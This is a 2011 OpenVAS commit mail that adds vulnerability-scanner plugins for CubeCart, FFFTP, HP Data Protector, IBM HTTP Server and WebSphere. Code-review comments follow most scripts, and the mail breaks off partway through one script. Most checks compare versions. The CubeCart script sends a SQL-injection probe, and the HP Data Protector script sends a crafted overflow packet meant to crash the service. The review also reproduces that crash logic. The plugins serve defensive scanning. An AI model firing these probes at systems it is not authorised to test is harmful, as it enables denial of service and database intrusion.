[Openvas-commits] r12045 - trunk/openvas-plugins/scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Tue Nov 8 16:46:31 CET 2011


Author: antu123
Date: 2011-11-08 16:46:26 +0100 (Tue, 08 Nov 2011)
New Revision: 12045

Added:
   trunk/openvas-plugins/scripts/gb_cubecart_mult_xss_n_sql_inj_vuln.nasl
   trunk/openvas-plugins/scripts/gb_ffftp_untrusted_search_path_vuln.nasl
   trunk/openvas-plugins/scripts/gb_hp_data_protector_media_operations_bof_vuln.nasl
   trunk/openvas-plugins/scripts/gb_ibm_http_server_mult_xss_vuln.nasl
   trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_xss_vuln.nasl
   trunk/openvas-plugins/scripts/gb_ibm_was_jndi_imp_info_disclosure_vuln.nasl
   trunk/openvas-plugins/scripts/gb_ibm_was_jsf_info_disclosure_vuln.nasl
   trunk/openvas-plugins/scripts/gb_joomla_barter_sites_category_id_param_sql_inj_vuln.nasl
   trunk/openvas-plugins/scripts/gb_joomla_techfolio_comp_catid_param_sql_inj_vuln.nasl
   trunk/openvas-plugins/scripts/gb_njstar_communicator_minismtp_server_bof_vuln.nasl
   trunk/openvas-plugins/scripts/gb_wireshark_bof_n_dos_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_wireshark_csn1_dissector_dos_vuln_win.nasl
Log:
Added new plugins

Added: trunk/openvas-plugins/scripts/gb_cubecart_mult_xss_n_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cubecart_mult_xss_n_sql_inj_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_cubecart_mult_xss_n_sql_inj_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,115 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_cubecart_mult_xss_n_sql_inj_vuln.nasl 17767 2011-11-04 11:10:29 nov $
+#
+# CubeCart Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802199);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2010-4903");
+  script_bugtraq_id(43114);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-04 11:10:29 +0200 (Fri, 04 Nov 2011)");
+  script_name("CubeCart Multiple Cross-Site Scripting and SQL Injection Vulnerabilities");
+  desc = "
+  Overview: This host is running CubeCart and is prone to SQL injection and
+  multiple cross-site scripting vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to,
+  - Input passed to the 'amount', 'cartId', 'email', 'transId', and
+    'transStatus' parameters in 'modules/gateway/WorldPay/return.php' is not
+    properly sanitised before being returned to the user.
+  - Input passed via the 'searchStr' parameter to index.php
+    (when '_a' is set to 'viewCat') is not properly sanitised before being used
+    in a SQL query.
+
+  Impact:
+  Successful exploitation will let attackers to execute arbitrary HTML and
+  script code in a user's browser session in context of an affected site and
+  manipulate SQL queries by injecting arbitrary SQL code.
+
+  Impact Level: Application.
+
+  Affected Software/OS:
+  CubeCart version 4.3.3
+
+  Fix: Upgrade to CubeCart version 4.4.2 or later
+  For updates refer, http://www.cubecart.com/tour
+
+  References:
+  http://secunia.com/advisories/41352
+  http://www.securityfocus.com/archive/1/archive/1/513572/100/0/threaded
+  http://www.acunetix.com/blog/web-security-zone/articles/sql-injection-xss-cubecart-4-3-3/ ";
+
+  script_description(desc);
+  script_summary("Check if CubeCart is vulnerable for SQL injection attack");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+  exit(0);
+}
+
+foreach dir (make_list("/cart", "/store", "/shop", "/cubecart", cgi_dirs()))
+{
+  ## Send and Receive the response
+  req = http_get(item: string(dir, "/admin.php?_g=login&goto=%2Fcubecart%2F" +
+                        "admin.php"), port:port);
+  res = http_keepalive_send_recv(port:port,data:req);
+
+  ## Confirm the Application
+  if("<title>CubeCart" >< res)
+  {
+    ## Try attack and check the response to confirm vulnerability
+    url = string(dir, "/index.php?searchStr='&_a=viewCat&Submit=Go");
+
+    if(http_vuln_check(port:port, url:url, pattern:"You have an error " +
+              "in your SQL syntax;", extra_check:"> SELECT id FROM cube_" +
+              "CubeCart_search WHERE searchstr="))
+    {
+      security_hole(port);
+      exit(0);
+    }
+  }
+}
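Review bot: The confirmation passed to `http_vuln_check` pins the SQL-error evidence to `cube_CubeCart_search`, and the `cube_` part looks installation-specific (a database or table prefix rather than a CubeCart constant), so a vulnerable 4.3.3 shop with a different prefix would be reported clean; if `extra_check` is regex-matched the way `pattern` is, something like `extra_check:"SELECT id FROM [A-Za-z0-9_]*CubeCart_search WHERE searchstr="` keeps the evidence without tying it to one schema name. The test also depends on the application echoing MySQL errors to the client, so a host with error display turned off is silently skipped — a comment beside the `url =` line such as `## Relies on the MySQL error being echoed back; no finding on hosts with error display off` would spare the next maintainer from chasing false negatives. Style: `security_hole(port)` here versus `security_hole(port:port)` in the sibling scripts of this commit — the named form reads more clearly.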

Added: trunk/openvas-plugins/scripts/gb_ffftp_untrusted_search_path_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ffftp_untrusted_search_path_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_ffftp_untrusted_search_path_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,86 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ffftp_untrusted_search_path_vuln.nasl 18409 2011-11-08 16:10:17 nov $
+#
+# FFFTP Untrusted Search Path Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802505);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2011-3991");
+  script_bugtraq_id(50412);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"creation_date", value:"2011-11-08 16:10:17 +0530 (Tue, 08 Nov 2011)");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_name("FFFTP Untrusted Search Path Vulnerability (Windows)");
+  desc = "
+  Overview: The host is running FFFTP and is prone to untrusted search path
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to an error in application, loading executables
+  (e.g. notepad.exe) in an insecure manner.
+
+  Impact:
+  Successful exploitation could allow attackers to execute an arbitrary program
+  in the context of the user running the affected application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  FFFTP version 1.98a and prior on windows
+
+  Fix: Upgrade to the FFFTP version 1.98b or later,
+  For updates refer, http://sourceforge.jp/projects/ffftp/releases/
+
+  References:
+  http://secunia.com/advisories/46649
+  http://xforce.iss.net/xforce/xfdb/71020
+  http://jvn.jp/en/jp/JVN62336482/index.html
+  http://jvndb.jvn.jp/ja/contents/2011/JVNDB-2011-000091.html ";
+
+  script_description(desc);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_summary("Check the version of FFFTP");
+  script_category(ACT_GATHER_INFO);
+  script_family("General");
+  script_dependencies("gb_ffftp_detect.nasl");
+  script_require_keys("FFFTP/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+ftpVer = get_kb_item("FFFTP/Ver");
+if(!ftpVer){
+  exit(0);
+}
+
+## Check for FFFTP version <= 1.98a (1.98.1.0)
+if(version_is_less_equal(version:ftpVer, test_version:"1.98.1.0")){
+  security_hole(0);
+}
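Review bot: The comparison `version_is_less_equal(version:ftpVer, test_version:"1.98.1.0")` assumes `FFFTP/Ver` has already been normalised from FFFTP's letter suffix (`1.98a`) into dotted form, as the comment above it implies; if `gb_ffftp_detect.nasl` stores the raw `1.98a` string, the outcome of comparing `a` against `1` depends on how version_func treats a non-numeric component, and the fixed release named in `desc` (1.98b) could be flagged or a vulnerable one missed. The detection script is not part of this commit, so I cannot confirm either way. Making the contract explicit would help: `## FFFTP/Ver must be dotted-numeric (1.98a -> 1.98.1.0); produced by gb_ffftp_detect.nasl` together with a guard `if(ftpVer !~ "^[0-9.]+$") exit(0);` before the comparison.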

Added: trunk/openvas-plugins/scripts/gb_hp_data_protector_media_operations_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_hp_data_protector_media_operations_bof_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_hp_data_protector_media_operations_bof_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,118 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_hp_data_protector_media_operations_bof_vuln.nasl 18407 2011-11-08 11:11:11Z nov $
+#
+# HP Data Protector Media Operations Heap Buffer Overflow Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802269);
+  script_version("$Revision: $");
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"creation_date", value:"2011-11-08 11:11:11 +0530 (Tue, 08 Nov 2011)");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_name("HP Data Protector Media Operations Heap Buffer Overflow Vulnerability");
+  desc = "
+  Overview: This host is running HP Data Protector Media Operations and is
+  prone to buffer overflow vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to a boundary error when processing large size
+  packets. This can be exploited to cause a heap-based buffer overflow via
+  a specially crafted packet sent to port 19813.
+
+  Impact:
+  Successful exploitation may allow remote attackers to execute arbitrary code
+  within the context of the application or cause a denial of service condition.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  HP Data Protector Media Operations versions 6.20 and prior.
+
+  Fix: No solution or patch is available as on 08th November, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer,
+  http://www8.hp.com/us/en/software/software-product.html?compURI=tcm:245-936920
+
+  References:
+  http://osvdb.org/show/osvdb/76842
+  https://secunia.com/advisories/46688
+  http://aluigi.altervista.org/adv/hpdpmedia_2-adv.txt
+  http://packetstormsecurity.org/files/106591/hpdpmedia_2-adv.txt ";
+
+  script_description(desc);
+  script_summary("Determine HP Data Protector Media Operations Buffer Overflow Vulnerability");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Buffer overflow");
+  script_dependencies("find_service.nes");
+  script_require_ports(19813);
+  exit(0);
+}
+
+## Default Port
+port = 19813;
+if(!get_port_state(port)){
+  exit(0);
+}
+
+## Open TCP Socket
+soc = open_sock_tcp(port);
+if(!soc){
+  exit(0);
+}
+
+## Check Banner And Confirm Application
+res = recv(socket:soc, length:512);
+if("MediaDB.4DC" >!< res)
+{
+  close(soc);
+  exit(0);
+}
+
+## Building Exploit
+head = raw_string(0x03, 0x00, 0x00, 0x01, 0xff, 0xff, 0xf0, 0x00, 0x01, 0x02,
+                  0x03, 0x04, 0x04);
+junk = crap(data:"a", length: 65536);
+
+## Sending Exploit
+send = send(socket:soc, data: head + junk);
+close(soc);
+
+## Waiting
+sleep(3);
+
+## Try to Open Socket
+if(!soc1 =  open_sock_tcp(port))
+{
+  security_hole(port);
+  exit(0);
+}
+
+## Confirm Server is still alive and responding
+if(! res = recv(socket:soc1, length:512)){
+  security_hole(port);
+}
+close(soc1);
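Review bot: The vulnerable verdict after the 64 KB send rests on weak evidence: `security_hole` fires if the reconnect at the `open_sock_tcp(port)` line fails or if the second `recv` returns nothing, and either can happen on a healthy but busy daemon (backlog exhausted, per-source rate limiting, or the greeting arriving after the default recv timeout) — a false positive from an ACT_DENIAL check is costly to retract. Since the service greets with `MediaDB.4DC` on connect (the very fingerprint used before the send), the liveness check should look for that banner rather than any bytes, and the reconnect should be retried a few times with a short pause before concluding the process is gone. Style: the result of the send is stored in a variable named `send`, which shadows the builtin's name and is never read — `send(socket:soc, data:head + junk);` is enough.
```nasl
## … unchanged: banner check, exploit construction and send …
sleep(3);

## Retry the reconnect a few times before declaring the daemon dead
for(i = 0; i < 3; i++)
{
  soc1 = open_sock_tcp(port);
  if(soc1) break;
  sleep(2);
}
if(!soc1)
{
  security_hole(port:port);
  exit(0);
}

## Alive only if the original greeting is still sent
res = recv(socket:soc1, length:512);
close(soc1);
if("MediaDB.4DC" >!< res){
  security_hole(port:port);
}
```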

Added: trunk/openvas-plugins/scripts/gb_ibm_http_server_mult_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ibm_http_server_mult_xss_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_ibm_http_server_mult_xss_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,106 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ibm_http_server_mult_xss_vuln.nasl 18222 2011-11-03 12:12:12Z nov $
+#
+# IBM HTTP Server Multiple Cross Site Scripting Vulnerabilities
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801996);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2011-1360");
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-08 19:48:57 +0530 (Tue, 08 Nov 2011)");
+  script_name("IBM HTTP Server Multiple Cross Site Scripting Vulnerabilities");
+  desc = "
+  Overview: This host is running IBM HTTP Server and is prone to multiple cross
+  site scripting vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are caused due to improper validation of user-supplied input
+  by a documentation page located in the 'manual/ibm' sub directories. That
+  allows attackers to execute arbitrary HTML and script code in a user's
+  browser session in the context of an affected site.
+
+  Impact:
+  Successful exploitation will allow remote attackers to insert arbitrary HTML
+  and script code, which will be executed in a user's browser session in the
+  context of an affected site.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  IBM HTTP Server version 2.0.47 and prior.
+
+  Fix: Apply the following patch,
+  http://www-01.ibm.com/support/docview.wss?rs=180&context=SSEQTP&dc=D600&uid=swg21502580
+
+  *****
+  NOTE: Please ignore this warning if the above mentioned patch is already applied.
+  *****
+
+  References:
+  http://xforce.iss.net/xforce/xfdb/69656
+  http://www-01.ibm.com/support/docview.wss?uid=swg21502580
+  http://www-01.ibm.com/support/docview.wss?rs=180&context=SSEQTP&dc=D600&uid=swg21502580 ";
+
+  script_description(desc);
+  script_summary("Check the version of IBM HTTP Server is vulnerable to Cross-Site Scripting");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web Servers");
+  script_dependencies("http_version.nasl");
+  script_require_ports("Services/www", 80, 8880, 8008);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+## Get the HTTP ports
+port = get_http_port(default:80);
+
+## check the port status
+if(get_port_state(port))
+{
+  ## Get the Server banner
+  ibmWebSer = get_http_banner(port);
+
+  # Confirm the IBM HTTP Server
+  if("Server: IBM_HTTP_Server" >< ibmWebSer)
+  {
+    ## Check for the  BM HTTP Server version.
+    ver = eregmatch(pattern:"IBM_HTTP_Server/([0-9.]+)", string:ibmWebSer);
+    if(ver[1])
+    {
+      if(version_is_less_equal(version:ver[1], test_version:"2.0.47"))
+      {
+        security_warning(port);
+        exit(0);
+      }
+    }
+  }
+}
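Review bot: The verdict is version-only (`version_is_less_equal(version:ver[1], test_version:"2.0.47")` on the `Server:` banner) while the Fix section of `desc` says the remedy is a patch, so a patched server whose banner is unchanged is still reported — the NOTE block at the end of `desc` concedes exactly that. Because the description locates the flaw in documentation pages under `manual/ibm`, a cheap corroborating step is a GET for `/manual/ibm/` (or one of the affected pages) and reporting only when it is actually served; hosts that removed or access-restricted the manual tree then stop appearing in results. Two small style nits: the comment reads `BM HTTP Server` (missing `I`), and `exit(0);` before the closing brace of the description block is indented one space instead of two.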

Added: trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_xss_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_xss_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,102 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ibm_was_admin_console_xss_vuln.nasl 18216 2011-11-04 13:13:13Z nov $
+#
+# IBM WebSphere Application Server Admin Console Cross-site Scripting Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801999);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2009-2748");
+  script_bugtraq_id(37015);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-04 14:37:49 +0530 (Fri, 04 Nov 2011)");
+  script_name("IBM WebSphere Application Server Admin Console Cross-site Scripting Vulnerability");
+  desc = "
+  Overview: The host is running IBM WebSphere Application Server and is prone
+  to cross-site scripting vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused by improper validation of user-supplied input in the
+  Administration Console, which allows the remote attacker to inject malicious
+  script into a Web page.
+
+  Impact:
+  Successful exploitation will let remote attackers to inject malicious script
+  into a Web page. Further an attacker could use this vulnerability to steal
+  the victim's cookie-based authentication credentials.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  IBM WebSphere Application Server (WAS) version 7.1 before 7.0.0.7
+  IBM WebSphere Application Server (WAS) version 6.1 before 6.1.0.29
+
+  Fix:
+  For WebSphere Application Server 6.1:
+  Apply the latest Fix Pack (6.1.0.29 or later) or APAR PK92057
+
+  For WebSphere Application Server 7.1:
+  Apply the latest Fix Pack (7.0.0.7 or later) or APAR PK92057
+
+  For Updates refer, http://www.ibm.com/support/docview.wss?uid=swg1PK92057
+
+  References:
+  http://xforce.iss.net/xforce/xfdb/54229
+  http://www.ibm.com/support/docview.wss?uid=swg1PK99481
+  http://www.ibm.com/support/docview.wss?uid=swg1PK92057 ";
+
+  script_description(desc);
+  script_summary("Check for the version of IBM WebSphere Application Server");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web Servers");
+  script_dependencies("gb_ibm_websphere_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!get_port_state(port)){
+  exit(0);
+}
+
+## Get Version from KB
+vers = get_kb_item(string("www/", port, "/websphere_application_server"));
+if(isnull(vers)){
+  exit(0);
+}
+
+## Check for IBM WebSphere Application Server versions
+if(version_in_range(version: vers, test_version: "7.0", test_version2: "7.0.0.6") ||
+   version_in_range(version: vers, test_version: "6.1", test_version2: "6.1.0.28")) {
+  security_warning(port:port);
+}
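Review bot: The affected-version text disagrees with the check: `desc` says `version 7.1 before 7.0.0.7` and the Fix section is headed `For WebSphere Application Server 7.1`, but the code ranges `7.0` to `7.0.0.6` and the fix pack named is 7.0.0.7, so `7.1` reads as a slip for 7.0 — a reader of the report would otherwise believe the 7.1 stream is in scope when the script never flags it. Please change both lines to `7.0` so the description matches the `version_in_range` call.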


Property changes on: trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_xss_vuln.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/gb_ibm_was_jndi_imp_info_disclosure_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ibm_was_jndi_imp_info_disclosure_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_ibm_was_jndi_imp_info_disclosure_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,106 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ibm_was_jndi_imp_info_disclosure_vuln.nasl 18216 2011-11-04 13:13:13Z nov $
+#
+# IBM WebSphere Application Server JNDI information disclosure Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802400);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2009-2747");
+  script_bugtraq_id(37355);
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-04 15:09:13 +0530 (Fri, 04 Nov 2011)");
+  script_name("IBM WebSphere Application Server JNDI information disclosure Vulnerability");
+  desc = "
+  Overview: The host is running IBM WebSphere Application Server and is prone
+  to information disclosure vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to error in the Naming and Directory Interface (JNDI)
+  implementation. It does not properly restrict access to UserRegistry object
+  methods, which allows remote attackers to obtain sensitive information via a
+  crafted method call.
+
+  Impact:
+  Successful exploitation will let remote unauthorized attackers to access
+  or view files or obtain sensitive information.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.39,
+  6.1 before 6.1.0.29, and 7.0 before 7.0.0.7
+
+  Fix:
+  For WebSphere Application Server 6.0:
+  Apply the latest Fix Pack (6.0.2.39 or later) or APAR PK91414
+
+  For WebSphere Application Server 6.1:
+  Apply the latest Fix Pack (6.1.0.29 or later) or APAR PK91414
+
+  For WebSphere Application Server 7.1:
+  Apply the latest Fix Pack (7.0.0.7 or later) or APAR PK91414
+
+  For updates refer, http://www.ibm.com/support/docview.wss?uid=swg1PK91414
+
+  References:
+  http://xforce.iss.net/xforce/xfdb/54228
+  http://www.ibm.com/support/docview.wss?uid=swg1PK99480
+  http://www.ibm.com/support/docview.wss?uid=swg1PK91414 ";
+
+  script_description(desc);
+  script_summary("Check for the version of IBM WebSphere Application Server");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web Servers");
+  script_dependencies("gb_ibm_websphere_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!get_port_state(port)){
+  exit(0);
+}
+
+## Get Version from KB
+vers = get_kb_item(string("www/", port, "/websphere_application_server"));
+if(isnull(vers)){
+  exit(0);
+}
+
+## Check for IBM WebSphere Application Server versions
+if(version_in_range(version: vers, test_version: "7.0", test_version2: "7.0.0.6") ||
+   version_in_range(version: vers, test_version: "6.0", test_version2: "6.0.2.38") ||
+   version_in_range(version: vers, test_version: "6.1", test_version2: "6.1.0.28")) {
+  security_warning(port:port);
+}
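Review bot: The Fix section heading `For WebSphere Application Server 7.1:` does not match the rest of this script: the affected list says `7.0 before 7.0.0.7`, the code checks `7.0`–`7.0.0.6`, and the fix pack is 7.0.0.7, so the heading should read `7.0` (the admin-console script in this same commit carries the same slip). The three-branch `version_in_range` chain itself is consistent with the affected list.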


Property changes on: trunk/openvas-plugins/scripts/gb_ibm_was_jndi_imp_info_disclosure_vuln.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/gb_ibm_was_jsf_info_disclosure_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ibm_was_jsf_info_disclosure_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_ibm_was_jsf_info_disclosure_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,92 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ibm_was_jsf_info_disclosure_vuln.nasl 18216 2011-11-03 13:13:13Z nov $
+#
+# IBM WebSphere Application Server JSF Application Information Disclosure Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801998);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2011-1368");
+  script_bugtraq_id(50463);
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-03 18:00:39 +0530 (Thu, 03 Nov 2011)");
+  script_name("IBM WebSphere Application Server JSF Application Information Disclosure Vulnerability");
+  desc = "
+  Overview: The host is running IBM WebSphere Application Server and is prone
+  to information disclosure vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused by improper handling of requests in 'JSF' applications.
+  A remote attacker could gain unauthorized access to view files on the host.
+
+  Impact:
+  Successful exploitation will let remote unauthorized attackers to access
+  or view files or obtain sensitive information.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  IBM WebSphere Application Server versions 8.x before 8.0.0.1
+
